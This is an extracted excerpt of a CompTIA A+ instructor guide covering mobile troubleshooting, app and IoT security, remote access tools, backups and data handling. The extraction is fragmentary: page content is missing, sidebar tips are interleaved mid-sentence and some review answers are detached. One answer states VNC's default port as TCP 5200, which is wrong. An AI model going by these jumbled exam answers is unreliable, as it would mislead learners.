The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 629
Security Concerns
Consumer-grade smart devices and home automation products can be poorly
documented, and patch management/security response processes of vendors
can be inadequate. When they are designed for residential use, IoT devices can
suffer from weak defaults. They may be configured to "work" with a minimum of
configuration effort. There may be recommended steps to secure the device and
procedures to apply security patches that the customer never takes. For example,
devices may be left configured with the default administrator password.
In a corporate workspace, the main risk from smart device placement is that of
shadow IT, where employees deploy a network-enabled device without going
through a change and configuration management process. A vulnerability in the
device would put it at risk of being exploited as an access point to the network.
These devices also pose a risk for remote working, where the employee joins the
corporate VPN using a home wireless network that is likely to contain numerous
undocumented vulnerabilities and configuration weaknesses.
These risks can be mitigated by regular audits and through employee security
awareness training.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
630 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Review Activity:
Mobile OS Security
3
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 631
Topic 18B
Troubleshoot Mobile OS and Show
Slide(s)
Teaching
CORE 2 EXAM OBJECTIVES COVERED Tip
3.4 Given a scenario, troubleshoot common mobile OS and application issues. Many mobile issues
are solved by stock
reboot/reinstall/reset
approaches, but help
The troubleshooting techniques you use for PCs and laptops are similar to the ones students to match the
needed for resolving issues on mobile-device operating systems and applications. symptoms listed as
One difference is that apps, operating system, and hardware are tightly integrated content examples to
likely causes.
in mobile devices. You may need to troubleshoot all three components to
determine which one is causing the issue.
Access the iOS Control Center (left) by swiping from the top-right and Android notification
drawer by swiping from the top. These contain shortcuts for enabling or disabling radios
and other features. (Screenshots reprinted with permission from Apple Inc., and Android platform,
a trademark of Google LLC.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
632 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Reboot
Just as turning it off and on again is the tried and trusted method of "fixing" a
computer, a reboot can often resolve a transitory performance or stability issue
on a mobile device. Users generally leave their mobile devices in a sleep state.
Powering the device off closes all applications and clears any data from RAM. Data
and settings stored in the device are not affected. This kind of soft reset is usually
effective in restoring unresponsive or frozen systems and is one of the first things
to try when faced with a malfunctioning app or slow performance:
• On iOS, hold the Side/Top button for a few seconds to bring up the Power
Off option. When you are troubleshooting, leave the device powered off for a
minute, and then restart by holding the Side/Top button again. You can perform
a forced restart by: 1. pressing Volume Up, 2. pressing Volume Down, and 3.
holding the Side/Top button. The screen will go black, and then the device will
restart.
• On Android, hold the physical Power button for a few seconds to bring up the
Power Off prompt. If the touchscreen is unresponsive, a forced restart can
often be performed by holding the Power button for 10 seconds, though some
Android devices use a different button combination for this. You can also boot
an Android device to Safe Mode by tap-and-holding the Power Off message.
Safe Mode disables third-party apps but leaves core services running.
Factory Reset
A factory reset removes all user data, apps, and settings. The device will either
have to be manually reconfigured with a new user account and reloaded apps or
restored from a backup configuration. When you are performing a factory reset,
ensure that the device has a full battery charge or is connected to an external
power source.
• To factory reset an iOS device, use the option on the General page in Settings.
• For Android, you should check for specific instructions for each particular device.
On stock Android, you can initiate a reset from the System > Advanced section
of Settings.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 633
2. Connect the device to building power and Wi-Fi. An update may be blocked
when there is insufficient battery charge or when the device is connected to a
metered network.
4. Check that there is sufficient free space on the device. In iOS, use Settings >
General > Storage and on Android use Settings > Storage.
Vendors try to support device models for as long as possible, but it is frequently the
case that major (or sometimes minor) version updates can quite severely impact
performance when applied to older devices. Unfortunately, vendors tend not to provide
a rollback option for version updates. You can only report the issue and hope the
vendor supplies a fix.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
634 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
In iOS (left), enabling the rotation lock from Control Center prevents the device from autorotating.
The screenshot shows that the lock is currently unhighlighted (off). In Android (right), enabling
the autorotate button allows the screen to reorient automatically, while disabling it locks the
orientation. The screenshot shows a device with autorotate highlighted (enabled). (Screenshots
reprinted with permission from Apple Inc., and Android platform, a trademark of Google LLC.)
2. Check that the user is not touching any part of the screen as this will prevent
rotation.
3. Consider that some apps can only be used in a single orientation. These might
also interfere with other apps, so try closing apps via the task list. To show the
task list:
• On iOS, either double-tap the physical Home button or swipe up from the
bottom to the middle of the screen.
• On Android, select the square button from the navigation bar at the bottom
of the screen.
In Android, when autorotate is disabled, an icon is added to the navigation bar allowing
the user to change the orientation manually. In iOS, a manual control can be added via
the AssistiveTouch option, which is enabled via Accessibility settings.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 635
• In iOS, clearing an app from the multitasking list also force stops it. Either swipe
up or double tap the physical Home button, then swipe the app up off the
screen.
In Android, tap the square multitasking button (bottom-right) to view open apps, then swipe up to
remove them. Tap the app icon and select App info to use the Force Stop option or clear the app
cache. (Screenshot courtesy of Android platform, a trademark of Google LLC.)
If this doesn’t work, you can try clearing the app cache either from within the app or
(in Android) using the Clear Cache option under App info.
If the app is still unresponsive, reboot the device. If the problem persists, use
the store to check whether an update is pending and install it if so. You can use
the app’s page to check whether there are any reported issues. If an app fails to
update, check that it is compatible with the current OS version. Also verify that
there is sufficient storage space and that there is an Internet connection.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
636 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Another stock response to an app issue is to uninstall and then reinstall it.
• To uninstall an iOS app, tap-and-hold it until it wiggles, then press the X icon and
confirm by pressing Delete. To return the screen to normal, press the Home
button. Note that you cannot uninstall default apps.
The user's account lists previously used and purchased apps, even when they are
removed from a device. Reinstall the app via the store.
Also consider that mobile device management (MDM) software might prevent an app
or function from running in a certain context. Security policies might prevent use of the
camera within the corporate office, for instance, and any app that requires the camera
might then fail to start.
If an iPhone or iPad does not update over wireless, you can try attaching it to a macOS
device or Windows PC using a Lightning or Lightning-to-USB cable. In macOS Catalina or
later, iOS devices can be managed via Finder. In earlier versions and in Windows, they
are managed via the iTunes application.
Remember that Bluetooth range is less than Wi-Fi (up to about 10 meters or 30 feet).
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 637
Configuration Issues
Use the notification drawer or Control Center to check that the device is not in
airplane mode and that an individual radio function has not been disabled. Next,
use Settings to verify that the Wi-Fi network parameters or Bluetooth pairing
information is correct. Try removing/forgetting the network or Bluetooth pair and
reconnecting.
With Wi-Fi, verify that the access point supports the same 802.11 standard as the
device. For example, an access point configured to use 802.11ac only will not be
accessible to a smartphone with an 802.11n adapter. The access point must be put
into compatibility mode. Also remember that some mobile devices support 2.4 GHz
radios only and will not be able to connect to a network on the 5 GHz band.
If you can rule out any other configuration errors, consider obtaining an OS or
firmware update for the device or for the access point. Research any known issues
between the access point and the model of device.
Android supports a similar feature referred to as Nearby Share (Settings > Google >
Devices > Nearby Share).
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
638 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Review Activity:
Mobile OS and App Software
6
Teaching 1. True or false? A factory reset preserves the user's personal data.
Tip
Take some time at False. Restoring to factory settings means removing all user data and settings.
the end of each topic
to answer questions. 2. You are updating an internal support knowledge base with advice for
You can use the troubleshooting mobile devices. What is the first step to take if a user
review questions reports that an app will not start?
for discussion in
class or set them for Use force stop if available and/or reboot the device.
students to complete
individually during or 3. You are troubleshooting a user device that keeps powering off
after class. unexpectedly. You run hardware diagnostics and confirm there is
no component fault or overheating issue. What should your next
troubleshooting step be?
Check that the device has sufficient spare storage, and check for updates. If you
can’t identify a device-wide fault, test to see whether the issue is associated with
use of a single app.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 639
Topic 18C
Troubleshoot Mobile OS and
App Security
4
The close integration between device hardware, mobile OS, and vendor app stores Teaching
means that the security model for mobiles is more restrictive than for many Tip
desktop systems. However, threat actors can always find new ways to circumvent There’s a lot of overlap
security systems, and users might try to use devices in ways not sanctioned by the with troubleshooting
workstation security
IT department. Consequently, you should be able to identify symptoms of mobile
here, so you might be
OS and application security issues to mitigate risks from network intrusions and able to move quickly
data breaches. through this topic.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
640 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
App Spoofing
While this type of walled garden app store model is generally robust, it is still a
target for rogue developers trying to publish malicious apps that will function
as spyware if installed. A malicious app will typically spoof a legitimate app by
using a very similar name and use fake reviews and automated downloads to
boost its apparent popularity. VPN, fake antivirus/ad blockers, and dating apps are
some of the most common targets for malicious developers. Even when using an
approved store, users should apply caution when selecting and installing a new app,
especially if the app requests permissions that are not related to its function.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 641
In Android, each app has an Install unknown apps toggle. For example, enabling
the toggle shown here would allow the Firefox browser to download and install an app.
(Screenshot courtesy of Android platform, a trademark of Google LLC and Mozilla.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
642 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 643
Unauthorized location tracking can give away too much sensitive information to
third parties. Many apps collect location data; not many explain clearly what they
do with it. Most app developers will just want information they can use for targeted
advertising, but a rogue app could use location data to facilitate other crimes, such
as domestic burglary.
Managing location services in iOS (left) and Android. (Screenshots reprinted with permission
from Apple Inc., and Android platform, a trademark of Google LLC.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
644 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Review Activity:
Mobile OS and App Security
5
Teaching 1. You are assisting with the configuration of MDM software. One concern
Tip is to deny access to devices that might be able to run apps that could be
Take some time at used to circumvent the access controls enforced by MDM. What types of
the end of each topic configurations are of concern?
to answer questions.
You can use the Devices that are jailbroken or rooted allow the owner account complete control.
review questions
for discussion in
Devices that allow installation of apps from untrusted sources, such as by
class or set them for sideloading APK packages or via developer mode, could also have weakened
students to complete permissions.
individually during or
after class. 2. A user reports that a new device is not sustaining a battery charge for
more than a couple of hours. What type of malware could this be a
symptom of?
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 645
Lesson 18
Summary
4
You should be able to explain common methods for securing mobile and Show
embedded devices and troubleshoot common and security-related mobile Slide(s)
OS and app issues. Summary
Additional practice questions for the topics covered in this lesson are available on the
CompTIA Learning Center.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Lesson 19
Using Support and Scripting Tools
1
LESSON INTRODUCTION
As a CompTIA A+ technician, you will usually perform support tasks within the Show
context of a company’s operational procedures. These procedures include ways of Slide(s)
using remote access to handle problems more efficiently, coping with disasters so Objectives
that data loss and system downtime is minimized, identifying regulated data and
content, planning for security incident response, and potentially using scripting to Teaching
ensure standardized configuration changes. Tip
This lesson will help you to identify the technologies and best practices that The last part of
the Core 2 course
underpin these important procedures. principally covers
domain 4 (operational
Lesson Objectives procedures). This
lesson concentrates
on support tasks
In this lesson, you will:
and tools such as
• Use remote access technologies. remote access, data
security/backup, data
• Implement backup and recovery. privacy, and the use of
scripting.
• Explain data handling best practices.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
648 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 19A
Use Remote Access Technologies
2
Teaching A remote access utility allows you to establish a session on another computer on
Tip a local network or over the Internet. There are command-line and desktop remote
access tools. These are very useful for technical support and troubleshooting. The
We’ve already
mentioned the fact that remote access is so useful shows how important it is that such tools be
use of VPNs in this used securely. In this topic, you will learn about the features of different remote
course (and in Core 1), access tools and security considerations of using each one.
but explain the
importance of remote
access for support Remote Desktop Tools
technicians. As well
as discussing the With remote desktop, the target PC runs a graphical terminal server to accept
suitability of different connections from clients. This allows a user to work at the desktop of a different
tools for end-user computer over the network.
and support tasks,
identify security Remote desktop is often configured for laptop users working from home with a
considerations. slow link. Having gained access to the corporate network (via the Internet using a
VPN, for example) they could then establish a remote desktop connection to a PC
Show
in the office. A technician can also use a remote desktop access tool to configure or
Slide(s)
troubleshoot a computer.
Remote Desktop Tools
When allowing remote access to a host or network, you must assess and resolve
Teaching security considerations:
Tip • Remote access permissions should be granted to accounts selectively using least
Explain the risks of privilege principles.
opening systems up
to remote access, • The connection must use encryption to be made secure against snooping. Users
and identify RDP and must have a means of confirming that they are connecting to a legitimate server
VNC as the two main
protocols used for
to mitigate the risk of evil twin–type attacks. The server can be installed with a
desktop-based remote digital certificate to identify it securely.
access.
• The server software supporting the connection must be safe from vulnerabilities,
especially when the server port is accessible over the Internet.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 649
You also need to define credentials for the remote host. To specify a domain
account, use the format Domain\Username. To use a local account, use
either.\Username or Host\Username. RDP authentication and session
data is always encrypted. This means that a malicious user with access to the same
network cannot intercept credentials or interfere or capture anything transmitted
during the session.
A limitation of RDP on Windows is that only one person can be signed in at any one
time. Starting an RDP session will lock the local desktop. If a local user logs in, the
remote user will be disconnected.
There are versions of the mstsc client software for Linux, macOS, iOS, and Android,
so you can use devices running those operating systems to connect to an RDP
server running on a Windows machine.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
650 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Teaching
Tip
Mention risks from
malware that can
grab hashes from
system processes plus
risks from allowing
too many accounts
to connect. Remind
students that the
principle of least
privilege should be
applied. Also note
risks from allowing
connections to RDP
over the Internet as
it allows malicious
remote hosts to
scan the port for
vulnerabilities or to
get access via a weak
password.
Use the Select users link to define which accounts are permitted to connect
remotely. Users in the local administrators group are allowed to connect by default.
You can select users from the local accounts database or from the domain that the
machine is joined to.
Under Advanced settings, you can choose between allowing older RDP clients to
connect and requiring RDP clients that support Network Level Authentication (NLA).
NLA protects the RDP server against denial of service attacks. Without NLA, the
system configures a desktop before the user logs on. A malicious user can create
multiple pending connections to try to crash the system. NLA authenticates the user
before committing any resources to the session.
If Remote Desktop is used to connect to a server that has been compromised
by malware, the credentials of the user account used to make the connection
become highly vulnerable. RDP Restricted Admin (RDPRA) Mode and Remote
Credential Guard are means of mitigating this risk. You can read more about these
technologies at docs.microsoft.com/en-us/windows/security/identity-protection/
remote-credential-guard.
The Remote Desktop server runs on TCP port 3389 by default but can be changed
to another port.
Windows Home editions do not include the Remote Desktop server, so you cannot
connect to them, but they do include the client, so you can connect to other computers
from them.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 651
There are also open-source implementations of RDP, such as XRDP. You can use
XRDP to run an RDP server on a Linux host.
Teaching
Tip
Note that MSRA is
designed for use
on local networks.
Mention the Quick
Assist feature, and
note that we’ll discuss
third-party tools
designed to work over
the Internet later in
the lesson.
Remote Assistance assigns a port dynamically from the ephemeral range (49152
to 65535). This makes it difficult to configure a firewall securely to allow the
connection. Windows 10 feature updates introduced the Quick Assist feature
(CTRL+START+Q) as an alternative to msra.exe. Quick Assist works over the
encrypted HTTPS port TCP/443. The helper must be signed in with a Microsoft
account to offer assistance. The helper generates the passcode to provide to the
sharer.
Neither Remote Assistance nor Quick Assist allow the helper to perform tasks that
require UAC consent in the default configuration. Either the Secure Desktop feature of
UAC must be disabled, or UAC notifications need to be turned off or set to a lower level,
weakening the security configuration.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
652 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Secure Shell
Show Secure Shell (SSH) is also a remote access protocol, but it connects to a command
Slide(s) interpreter rather than a desktop window manager. SSH uses TCP port 22 (by
Secure Shell default). SSH uses encryption to protect each session. There are numerous
commercial and open-source SSH products available for all the major OS platforms.
Teaching Each SSH server is configured with a public/private encryption key pair, identified
Tip by a host key fingerprint. Clients use the host key fingerprint to verify that they are
Make sure students attempting to connect to a trusted server and mitigate the risk of on-path attacks.
understand that the A mapping of host names to SSH server keys can be kept manually by each SSH
host key validates
client, or there are various enterprise software products designed for SSH key
the identity of the
server and why this is management.
important.
Next explain the
method for the client
to authenticate to
the server. This can
use a password, or
it can use a client’s
public key.
The server’s host key pair is used to set up an encrypted channel so that the client
can submit authentication credentials securely. SSH allows various methods for
the client to authenticate to the server. Each of these methods can be enabled or
disabled as required on the server. Two commonly implemented methods are as
follows:
• Password authentication—The client submits a username and password that
are verified by the SSH server either against a local user database or using an
authentication server.
Monitoring for and removing compromised client public keys is a critical security task.
Many recent attacks on web servers have exploited poor SSH key management.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 653
• Agent that also performs endpoint detection and response (EDR) security
scanning.
• Remote network boot capability, often referred to as wake on LAN (WOL), plus
ability to enter system firmware setup and deploy firmware updates and OS
installs.
• Live chat and remote desktop and/or remote shell connection to hosts.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
654 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Screen-sharing Software
There are many third-party alternatives to the sort of screen-sharing and remote-
control functionality implemented by MSRA/Quick Assist. Examples include
TeamViewer and LogMeIn. Like Quick Assist, these products are designed to work
over HTTPS (TCP/443) across the Internet. This is secure because the connection is
encrypted, but also easier to implement as it does not require special firewall rules.
Some tools require the app to be installed locally, while others can be executed
non-persistently. The user can grant access to an assistant or technician by giving
them a PIN code generated by the local software installation.
Users must be made aware of the potential for threat actors to use social
engineering to persuade them to allow access. When used in a corporate
environment, there should be a specific out-of-band verification method for users
to confirm they are being contacted by an authorized technician.
Video-conferencing Software
Most video-conferencing or web-conferencing software, such as Microsoft Teams
or Zoom, includes a screen-share client, and some also allow participants to be
granted control of the share. The share can be configured as a single window or
the whole desktop. The share will have the privileges of the signed-in user, so these
apps cannot be used to perform any administrator-level configuration, but they
are useful for demonstrating a task to a user or reproducing a support issue by
observing the user.
Although the products have security mechanisms, there is always the potential for
misuse of this kind of file transfer feature. Users accepting connections from any
source could receive unsolicited transfer requests. It is best to only accept requests
from known contacts. The products can be subject to security vulnerabilities that
allow unsolicited transfers.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 655
Review Activity:
Remote Access Technologies
3
1. You are updating a procedure that lists security considerations for Teaching
remote access technologies. One of the precautions is to check that Tip
remote access ports have not been opened on the firewall without
Take some time at
authorization. Which default port for VNC needs to be monitored? the end of each topic
to answer questions.
Virtual Network Computing (VNC) uses TCP port 5200 by default. You can use the
review questions
2. True or false? You can configure a web server running on Linux to accept for discussion in
remote terminal connections from clients without using passwords. class or set them for
students to complete
True. This can be configured using public key authentication with the Secure Shell individually during or
(SSH) protocol. The server can be installed with the public keys of authorized users. after class.
3. You are joining a new startup business that will perform outsourced
IT management for client firms. You have been asked to identify an
appropriate software solution for off-site support and to ensure that
service level agreement (SLA) metrics for downtime incidents are
adhered to. What general class of remote access technology will be most
suitable?
Remote monitoring and management (RMM) tools are principally designed for use
by managed service providers (MSPs). As well as remote access and monitoring,
this class of tools supports management of multiple client accounts and billing/
reporting.
Configure a virtual private network (VPN) so that remote users can connect to the
corporate LAN and then launch the remote desktop protocol (RDP) client to connect
to the office PC.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
656 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 19B
Implement Backup and Recovery
5
Backup Operations
Show Data backup is a system maintenance task that enables you to store copies of
Slide(s) critical data for safekeeping. Backups protect against loss of data due to disasters
Backup Operations such as file corruption or hardware failure. Data recovery is a task that enables you
to restore user access to lost or corrupt data via the backup.
Teaching
Most large organizations will implement a structured backup scheme that includes
Tip
a backup schedule and specifications for which files are backed up, where the
The objective focuses backup is stored, and how it can be recovered.
on workstation
backup, which is more
applicable to home When a computer is connected to a network, it is bad practice for a user to store
users, but home users data locally (on the client PC's fixed disks). Network home folders and the use of
are unlikely to be scripts to copy data can help users to transfer data to a file server, where it can be
using media rotation. backed up safely.
Ideally, client PCs
should not host critical Personal backups are necessary for home users or on workgroups, where no
data. It should be central file server is available. In this scenario, the backup software supplied with
stored securely and Windows is serviceable. Most home users will back up to external hard drives or use
robustly on file-server
services.
some sort of cloud-based storage.
The exam objectives In Windows, user data backup options are implemented via the File History
don’t include Windows feature, which is accessed through Settings > Update & Security > Backup. You
backup tools as can configure a local drive or network folder as the target for storing backup files.
content examples, but You can choose which folders and files to include or exclude from the backup job
just mention them
plus a schedule for running the job.
here. Note that these
tools only perform
backup to a single
device and don’t
support rotation. They
make a full backup,
then a series of
incremental backups
for a period, and then
make another full
backup.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 657
Show
Slide(s)
Backup Methods
Teaching
Tip
Explain frequency
and retention
requirements.
Frequency is an
answer to the
question, “How
much work time that
was spent in data
generation/collection
can we afford to
lose?” The shorter
the period, the more
backup capacity is
required and the more
frequently backup jobs
must run. This period
could be seconds,
minutes, or hours. The
basic consideration
is whether
reconstructing the
Configuring File History backup options via Windows Settings. (Screenshot courtesy of Microsoft.) lost data manually
is possible or cost-
effective compared
If you need to restore a file or folder, you can either use the Previous Versions to the cost of
tab in the object’s Properties dialog box or use the File History applet to restore implementing the
multiple files. backup. You might
want to mention that
The Backup and Restore Center control panel tool provides an alternative backup this is associated with
manager. It can also be used to make image backups of the entire operating the recovery point
system, rather than just data file backups. objective (RPO) metric.
Retention answers the
question of version
Backup Methods control. For example,
if you back up changes
When considering a file server or database server, the execution and frequency of to a file on each day
backups must be carefully planned and guided by policies. Each backup job records of the week, at the
data as it was at a certain point in time. As each backup job might take up a lot of end of the week do
space and there is never limitless storage capacity, there must be some system you need to keep
each day’s backup,
to minimize the amount of data occupying backup storage media while still giving
or can you discard
adequate coverage of the required recovery window. the changes and just
Two main factors govern backup operations: keep the last version?
Can you be confident
• Frequency is the period between backup jobs. The frequency configuration in the integrity of the
reflects how much lost work can be tolerated. For example, if employees can latest version, or do
you need to keep the
recall and input the previous day’s work on document files, a daily backup will
last five versions?
meet the requirement. If the edits are much more difficult to reconstruct, backup Retention may also
frequency might need to be measured in hours, minutes, or seconds. be determined
by regulatory
• Retention is the period that any given backup job is kept for. Short-term requirements, which
retention is important for version control and for recovering from malware might determine
infection. Consider the scenario where a backup is made on Monday, a file minimum or
is infected with a virus on Tuesday, and when that file is backed up later on maximum periods
(or both).
Tuesday, the copy made on Monday is overwritten. This means that there is no
good means of restoring the uninfected file. In the long term, data may need Make sure students
understand how a
backup chain works.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
658 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Backup Chains
The requirements for backup frequency and retention must be managed against
the capacity of the backup media and the time it takes to complete a backup job.
These requirements are managed by using different types of jobs in a backup
chain. The main types of backups are full only, full with incremental, and full with
differential:
• “Full only” means that the backup job produces a file that contains all the data
from the source. This means that the backup file is nominally the same size as
the source, though it can be reduced via compression. A full backup has the
highest storage and time requirements but has the least recovery complexity as
only a single file is required.
• “Full with incremental” means that the chain starts with a full backup and then
runs incremental jobs that select only new files and files modified since the
previous job. An incremental job has the lowest time and storage requirement.
However, this type of chain has the most recovery complexity as it can involve
two or more jobs, each of which might be stored on different media.
• “Full with differential” means that the chain starts with a full backup and then
runs differential jobs that select new files and files modified since the original
full job. A differential chain has moderate time and storage requirements and
slightly less recovery complexity than incremental as it requires a maximum of
two jobs (the full backup plus the differential job).
Backup Job
Time and
Storage Recovery Archive
Type Data Selection Requirement Complexity Attribute
Full All selected data High Low (single job) Cleared
regardless of
when it was
previously
backed up
Incremental New files and Low High (multiple Cleared
files modified jobs)
since last
backup job
Differential New files and Moderate Moderate (two Not
files modified jobs) cleared
since last full
backup job
Windows uses an archive attribute to determine the backup status. Linux doesn't
support a file archive attribute. Instead, a date stamp is used to determine whether the
file has changed. Most software also has the capability to do copy backups. These are
made outside the chain system (ad hoc) and do not affect the archive attribute.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 659
Synthetic Backup
A synthetic backup is an option for creating full backups with lower data transfer
requirements. A synthetic full backup is not generated directly from the original
data but instead assembled from other backup jobs. It works as follows:
1. The chain starts with an initial full backup as normal and subsequently makes
a series of incremental backups.
2. When the next full backup is scheduled, the backup software makes one more
incremental backup. It then synthesizes a new full backup from the previous
full and incremental backups.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
660 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
A media rotation scheme such as GFS means that at least some of the backup
media can be taken for storage off site once the backup job has run. For example,
in the GFS scheme outlined above, four of the father tapes could be kept off site
at any one time. Grandfather tapes can all routinely be kept off site with only one
needing to be brought on site at the time of the backup job.
Transporting media off site is an onerous task, however. High-bandwidth Internet
and high-capacity cloud storage providers have made off-site backup solutions
more affordable and easier to implement.
While cloud backup is convenient, there are still substantial risks from failure of the
cloud provider. It is prudent to perform local backups in addition to cloud backup.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 661
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
662 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Review Activity:
Backup and Recovery
6
Teaching 1. What backup issue does the synthetic job type address?
Tip
A synthetic full backup reduces data transfer requirements and, therefore, backup
Take some time at job time by synthesizing a full backup from previous incremental backups rather
the end of each topic
than directly from the source data.
to answer questions.
You can use the
2. You are documenting workstation backup and recovery methods and
review questions
for discussion in want to include the 3-2-1 backup rule. What is this rule?
class or set them for
students to complete It states that you should have three copies of your data across two media types,
individually during or with one copy held offline and off site. The production data counts as one copy.
after class.
3. For which backup/restore issue is a cloud-based backup service an
effective solution?
The issue of provisioning an off-site copy of a backup. Cloud storage can also
provide extra capacity.
You can perform a test restore and validate the files. You can run an integrity
check on the media by using, for example, chkdsk on a hard drive used for backup.
Backup software can often be configured to perform an integrity check on each
file during a backup operation. You can also perform an audit of files included in a
backup against a list of source files to ensure that everything has been included.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 663
Topic 19C
Explain Data Handling Best Practices
5
When data that should be kept private is breached, it is almost impossible to Teaching
recover and re-secure. As a CompTIA A+ technician, it is imperative that you be able Tip
to recognize confidential and sensitive data types so that they can be protected This topic covers
from breaches. objectives 4.6
(prohibited content/
While you hope that security and data handling policies will be sufficient to activity and privacy,
protect your computer systems and networks, you also need to consider the licensing, and policy
situations where those protections fail. To cope with failures of security policy, or concepts) plus 2.8
attempted breaches of policy, organizations need well-rehearsed incident response (common data
procedures to investigate and remediate the breach. You will often be involved destruction and
disposal methods).
in identifying and reporting security incidents and potentially in assisting with
investigations and evidence gathering. It is important that you understand some
of the general principles of effective incident response and forensic investigation
procedures.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
664 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Healthcare Data
Healthcare data refers to medical and insurance records plus associated hospital
and laboratory test results. Healthcare data may be associated with a specific
person or used as an anonymized or de-identified data set for analysis and
research, such as in clinical trials to develop new medicines. An anonymized data
set is one where the identifying data is removed completely. A de-identified data
set contains codes that allow the subject information to be reconstructed by the
data provider. Healthcare data is highly sensitive. Consequently, the reputational
damage caused by a healthcare data breach is huge.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 665
